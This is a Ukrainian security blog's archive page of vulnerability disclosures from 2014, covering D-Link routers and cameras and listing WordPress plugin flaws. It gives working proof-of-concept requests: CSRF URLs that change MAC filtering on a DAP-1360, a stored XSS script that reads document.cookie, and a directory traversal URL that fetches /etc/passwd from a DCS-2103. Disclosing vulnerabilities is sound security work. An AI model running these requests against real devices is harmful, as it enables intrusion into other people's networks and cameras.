Архів для категорії 'Уразливості'
CSRF та XSS уразливості в D-Link DAP-1360
23:52 26.11.201421.06.2014
Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.
Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
26.11.2014
CSRF (WASC-09):
В розділі Wi-Fi - MAC filter - Filter mode можна змінити параметр MAC filter restrict mode:
Disabled:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}Allow:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}Deny:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}В розділі Wi-Fi - MAC filter - MAC addresses можна додавати і видаляти MAC адреси:
Додати:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]Видалити:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]XSS (persistent XSS) (WASC-08):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]Код спрацює на http://192.168.0.50/index.cgi#wifi/mac.
Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.
Уразливості в плагінах для WordPress №162
23:54 25.11.2014Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Photo-Gallery і Formidable Forms та програма Night Lion Security PHP Stress. Для котрих з’явилися експлоіти. Утіліта PHP Stress призначенна для проведення тестування вразливості до DoS атак, Photo-Gallery - це плагін для створення фото галерей, Formidable Forms - це плагін для створення форм.
- Night Lion Security PHP Stress (деталі)
- WordPress Photo-Gallery Cross Site Request Forgery (деталі)
- WordPress Formidable Forms Remote Code Execution (деталі)
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Добірка уразливостей
16:29 25.11.2014В даній добірці уразливості в веб додатках:
Уразливості в D-Link DCS-910
23:54 15.11.2014У листопаді, 05.11.2014, я виявив Abuse of Functionality, Brute Force та Cross-Site Request Forgery уразливості в D-Link DCS-910 (веб камера).
Раніше я писав про уразливості в D-Link DCS-930L.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
DT та FPD уразливості в D-Link DCS-2103
17:22 15.11.201411.07.2014
Сьогодні я виявив уразливості в D-Link DCS-2103 (веб камера). Зокрема Directory Traversal та Full path disclosure уразливості. Це перша частина дірок в DCS-2103.
Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP 1150 та D-Link DAP-1360.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
15.11.2014
Directory Traversal (Arbitrary File Download) (WASC-33):
http://site/cgi-bin/sddownload.cgi?file=/../../etc/passwd
Full path disclosure (WASC-13):
http://site/cgi-bin/sddownload.cgi?file=/
Уразлива версія D-Link DCS-2103, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.
Уразливості в D-Link DCS-930L
23:56 13.11.2014У листопаді, 05.11.2014, я виявив Abuse of Functionality, Brute Force та Cross-Site Request Forgery уразливості в D-Link DCS-930L (веб камера). Це перша частина дірок в DCS-930L.
Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP-1360 та D-Link DCS-2103.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
Добірка уразливостей
17:23 13.11.2014В даній добірці уразливості в веб додатках:
Уразливості в плагінах для WordPress №161
23:52 12.11.2014Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Work The Flow File Upload, iMember360is та WP-Affiliate Platform. Для котрих з’явилися експлоіти. Work The Flow File Upload - це плагін для завантаження файлів, iMember360is - це плагін для створення сайту з підпискою на його вміст, WP-Affiliate Platform - це плагін для створення та управління філіалами.
- WordPress Work-The-Flow 1.2.1 Shell Upload (деталі)
- WordPress iMember360is 3.9.001 XSS / Disclosure / Code Execution (деталі)
- WordPress WP-Affiliate Platform Cross Site Scripting (деталі)
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Добірка уразливостей
17:23 11.11.2014В даній добірці уразливості в веб додатках:
- HP Service Manager, Injection of Arbitrary Code, Remote Privilege Elevation, Remote Disclosure of Privileged Information and Cross Site Scripting (XSS) (деталі)
- rexx Recruitment: Cross-Site Scripting in User Registration (деталі)
- postfixadmin security update (деталі)
- Vulnerability in otrs (деталі)
- Evolution Data Server vulnerability (деталі)
